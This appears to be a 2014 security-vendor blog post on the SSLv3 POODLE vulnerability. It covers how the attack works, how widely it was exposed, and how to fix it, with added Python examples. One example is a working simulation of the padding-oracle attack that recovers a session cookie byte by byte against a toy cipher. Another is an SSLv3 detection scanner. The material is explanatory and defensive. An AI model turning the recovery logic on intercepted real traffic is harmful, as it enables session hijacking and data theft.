(October 27, 2014) – As soon as the POODLE vulnerability in SSLv3 [CVE-2014-3566] was disclosed, the SecurityScorecard R&D team set out to determine how much of the public Internet was affected by this potentially severe exposure. In addition, to separate fact from fiction, we sought to determine how exploitable POODLE really is and to assign it a realistic risk rating.
Fig 1.1 – Global Map of Servers vulnerable to POODLE
What is POODLE?
POODLE stands for Padding Oracle On Downgraded Legacy Encryption [CVE-2014-3566]. It was first identified by researchers at Google. They compared the exploitation scenario to that of the BEAST attack on SSL/TLS in 2011: both are chosen-plaintext attacks on CBC-mode cipher suites in which an attacker who can make the victim's browser send requests, and can tamper with the encrypted records in transit, recovers a secret such as a session cookie one byte at a time. POODLE differs in the decryption method. SSL 3.0 does not define the contents of the CBC padding bytes and checks only the final length byte, so a record whose last ciphertext block has been swapped for a target block is still accepted whenever one byte of its decryption takes a specific value; that happens once in about 256 attempts, and each acceptance leaks one byte of plaintext. The "downgrade" part is that browsers which fail to complete a TLS handshake retry with older protocol versions, so an active attacker can force an SSL 3.0 session even where both sides support TLS.
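The padding-oracle step described above, as an added example that is not part of the original post or of the Google paper: a self-contained Python simulation of an SSL 3.0-style CBC record (MAC, then undefined padding bytes plus a length byte, then CBC encryption) and an attacker who recovers a session cookie byte by byte by swapping the all-padding final block for a target block. The block cipher is a toy keyed Feistel network standing in for AES or 3DES; the attack uses only CBC chaining, so the cipher choice is irrelevant. The keys, the cookie value, the `client_request` model of the victim browser and the `poodle_recover` attacker loop are all constructed for this example.

```python
# Added example, not code from the original post. Toy SSL 3.0 CBC record
# handling and the POODLE byte-recovery loop. Keys and cookie are constructed.
import hashlib
import hmac
import os

BLOCK = 16        # cipher block size
MAC_LEN = 20      # SHA-1 MAC, as in the SSL 3.0 *_SHA cipher suites
KEY_ENC = b"constructed-enc-key"
KEY_MAC = b"constructed-mac-key"
SECRET_COOKIE = b"session=8f3a9c1d2e"   # constructed; unknown to the attacker


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def _enc_block(key, blk):
    """Toy 4-round Feistel cipher on 16-byte blocks (stand-in for AES/3DES)."""
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r


def _dec_block(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r


def ssl3_encrypt_record(data):
    """MAC, then pad, then CBC-encrypt, as SSL 3.0 does. The pad bytes before
    the final length byte are undefined by SSL 3.0 (random here); only the
    length byte is checked on receipt. That is the flaw POODLE exploits."""
    mac = hmac.new(KEY_MAC, data, hashlib.sha1).digest()
    pad_len = (BLOCK - (len(data) + MAC_LEN + 1) % BLOCK) % BLOCK
    plain = data + mac + os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)           # fresh IV, so every record looks different
    out, prev = b"", iv
    for i in range(0, len(plain), BLOCK):
        prev = _enc_block(KEY_ENC, _xor(plain[i:i + BLOCK], prev))
        out += prev
    return iv + out


def ssl3_server_accepts(record):
    """The oracle: True if the record decrypts, de-pads and passes the MAC
    check. On the wire the attacker sees this as 'no alert' vs 'alert'."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    plain, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        plain += _xor(_dec_block(KEY_ENC, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    pad_len = plain[-1]
    if pad_len >= BLOCK or len(plain) < pad_len + 1 + MAC_LEN:
        return False
    body = plain[:len(plain) - pad_len - 1]   # pad bytes are never inspected
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(hmac.new(KEY_MAC, data, hashlib.sha1).digest(), mac)


def client_request(prefix_len, suffix_len):
    """The victim browser: attacker-chosen bytes (URL path, POST body) are
    sent around the secret cookie that the browser attaches automatically."""
    return ssl3_encrypt_record(b"A" * prefix_len + SECRET_COOKIE + b"B" * suffix_len)


def poodle_recover(secret_len, oracle=ssl3_server_accepts, client=client_request):
    """Recover the cookie one byte at a time; about 256 requests per byte."""
    recovered, attempts = bytearray(), 0
    for t in range(secret_len):
        # Prefix length puts secret byte t at the end of a block; suffix length
        # makes data+MAC fill whole blocks, so the record's last block is pure
        # padding with length byte BLOCK-1.
        prefix_len = (BLOCK - 1 - t) % BLOCK
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK
        target = (prefix_len + t) // BLOCK      # plaintext block holding byte t
        while True:
            rec = client(prefix_len, suffix_len)
            attempts += 1
            c_i = rec[BLOCK * (target + 1):BLOCK * (target + 2)]   # rec[:16] is the IV
            c_i_prev = rec[BLOCK * target:BLOCK * (target + 1)]
            c_n_prev = rec[-2 * BLOCK:-BLOCK]
            # Swap the all-padding last block for C_i. The server decrypts it to
            # D(C_i) xor C_{n-1} = P_i xor C_{i-1} xor C_{n-1} and accepts only
            # when its last byte equals BLOCK-1, which reveals P_i's last byte.
            if oracle(rec[:-BLOCK] + c_i):
                recovered.append((BLOCK - 1) ^ c_i_prev[-1] ^ c_n_prev[-1])
                break
    return bytes(recovered), attempts
```

Note what makes the oracle work: `ssl3_server_accepts` discards `pad_len + 1` bytes without ever reading the pad bytes themselves. TLS 1.0 and later require every padding byte to equal the length byte and verify all of them, so the swapped block, whose other fifteen bytes are effectively random, is rejected and the byte-at-a-time recovery never gets off the ground.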
As of this blog posting, several security commentators hold that POODLE only matters on Local Area Networks [LANs], where an attacker can decrypt traffic during a local Man-in-the-Middle [MITM] attack, and that the vulnerability is therefore likely to affect small-scale networks only. SecurityScorecard research found the problem may be more widespread than initially thought. Figure 1.1, from PoodleMap.com, shows 1,012,172 servers detected as vulnerable, including servers on military systems, government systems and large financial enterprise networks.
PoodleMap.com is a public website that shows the geographic distribution of POODLE-vulnerable servers. We urge you to search for your own IP addresses to see whether your network is affected.
How risky is POODLE?
SecurityScorecard research confirmed the PoodleMap.com findings: we identified in excess of 1 million public IP addresses vulnerable to a POODLE attack against SSLv3. More important, we found that the greater risk lies in a Man-in-the-Middle [MITM] attack carried out at the ISP/carrier level. If interception took place at that level, decryption of large segments of SSLv3 traffic would be possible.
Although difficult for a novice hacker, an organized group of experienced cybercriminals could carry out a carrier-level interception, as could rogue government units and intelligence agencies the world over. SecurityScorecard believes this could lead to widespread data theft, loss of national secrets and loss of corporate intellectual property.
How can I defend my servers against POODLE?
The straightforward defence is to disable SSLv3 on your servers (for example `SSLProtocol all -SSLv2 -SSLv3` in Apache httpd, or `ssl_protocols TLSv1 TLSv1.1 TLSv1.2;` in nginx) and to upgrade OpenSSL to 1.0.1j or later, which adds support for TLS_FALLBACK_SCSV so that a client which also supports it cannot be tricked into retrying with SSLv3 by an attacker who breaks its TLS handshakes. Upgrading OpenSSL on its own does not switch SSLv3 off; it only helps block the downgrade, so the protocol still has to be disabled in the server configuration, and the result should be verified from outside the network afterwards.
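One way to verify that a server no longer negotiates SSLv3 with a CBC suite (the precondition for POODLE), as an added example that is not the original post's or PoodleMap.com's code: the script below hand-builds an SSL 3.0 ClientHello offering only CBC suites, sends it, and classifies the first record that comes back, so it does not depend on the local OpenSSL build still permitting `openssl s_client -ssl3`. The host/port parameters, the suite list and the sample replies in `sample_responses` are constructed for this example.

```python
# Added example, not from the original post. Minimal SSL 3.0 + CBC negotiation
# check. Suite list and sample responses are constructed for illustration.
import socket
import struct

SSL3 = b"\x03\x00"
# Only CBC suites are offered, so a ServerHello means a POODLE-relevant suite is
# negotiable, not merely that SSL 3.0 is enabled with, say, RC4.
CBC_SUITES = {
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}


def build_sslv3_client_hello(client_random=b"\x00" * 32):
    """SSL 3.0 record (type 22) carrying a ClientHello (handshake type 1)."""
    suites = b"".join(struct.pack(">H", s) for s in CBC_SUITES)
    body = (SSL3 + client_random + b"\x00"           # version, random, empty session id
            + struct.pack(">H", len(suites)) + suites
            + b"\x01\x00")                           # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16" + SSL3 + struct.pack(">H", len(handshake)) + handshake


def classify_response(data):
    """Interpret the first record the server sends back."""
    if len(data) < 5:
        return {"sslv3": False, "suite": None, "reason": "no response (connection closed)"}
    ctype, ver = data[0], data[1:3]
    if ctype == 0x15 and len(data) >= 7:             # alert record
        return {"sslv3": False, "suite": None,
                "reason": "alert level=%d description=%d" % (data[5], data[6])}
    if ctype == 0x16 and len(data) >= 11 and data[5] == 0x02 and data[9:11] == SSL3:
        # ServerHello: version(2) random(32) sid_len(1) sid cipher_suite(2) compression(1)
        sid_len = data[43] if len(data) > 43 else 0
        pos = 44 + sid_len
        suite = struct.unpack(">H", data[pos:pos + 2])[0] if len(data) >= pos + 2 else None
        name = CBC_SUITES.get(suite, "suite 0x%04x" % (suite or 0))
        return {"sslv3": True, "suite": suite,
                "reason": "ServerHello for SSL 3.0 with %s" % name}
    return {"sslv3": False, "suite": None,
            "reason": "unexpected record type 0x%02x version %s" % (ctype, ver.hex())}


def check_host(host, port=443, timeout=5.0):
    """Live check: connect, send the ClientHello, classify the first reply.
    Not exercised offline; run it against hosts you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_sslv3_client_hello())
        try:
            data = s.recv(4096)
        except (socket.timeout, ConnectionResetError):
            data = b""
    return classify_response(data)


def sample_responses():
    """Constructed replies used to exercise classify_response offline."""
    hello_body = SSL3 + b"\x11" * 32 + b"\x00" + b"\x00\x2f" + b"\x00"
    hello = b"\x02" + len(hello_body).to_bytes(3, "big") + hello_body
    return {
        "vulnerable": b"\x16" + SSL3 + struct.pack(">H", len(hello)) + hello,
        "alert": b"\x15" + SSL3 + b"\x00\x02" + b"\x02\x28",   # fatal handshake_failure
        "closed": b"",
    }


if __name__ == "__main__":
    import sys
    print(check_host(sys.argv[1] if len(sys.argv) > 1 else "localhost"))
```

A server that has been fixed answers with an alert (typically handshake_failure or protocol_version) or simply closes the connection; a ServerHello carrying one of the offered CBC suites means SSLv3 with CBC is still on and the host belongs on the PoodleMap count. Run it from outside your perimeter as well as inside, since load balancers and CDNs often terminate TLS with their own settings.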
References
Google whitepaper – https://www.openssl.org/~bodo/…
Glossary
Carrier – Telecommunications company
POODLE – Padding Oracle On Downgraded Legacy Encryption, an attack against SSLv3
SSL – Secure Sockets Layer, used for encrypting communications
TLS – Transport Layer Security, developed as the follow-up to SSL
MITM – Man In The Middle attack, whereby a malicious actor intercepts traffic
ISP – Internet Service Provider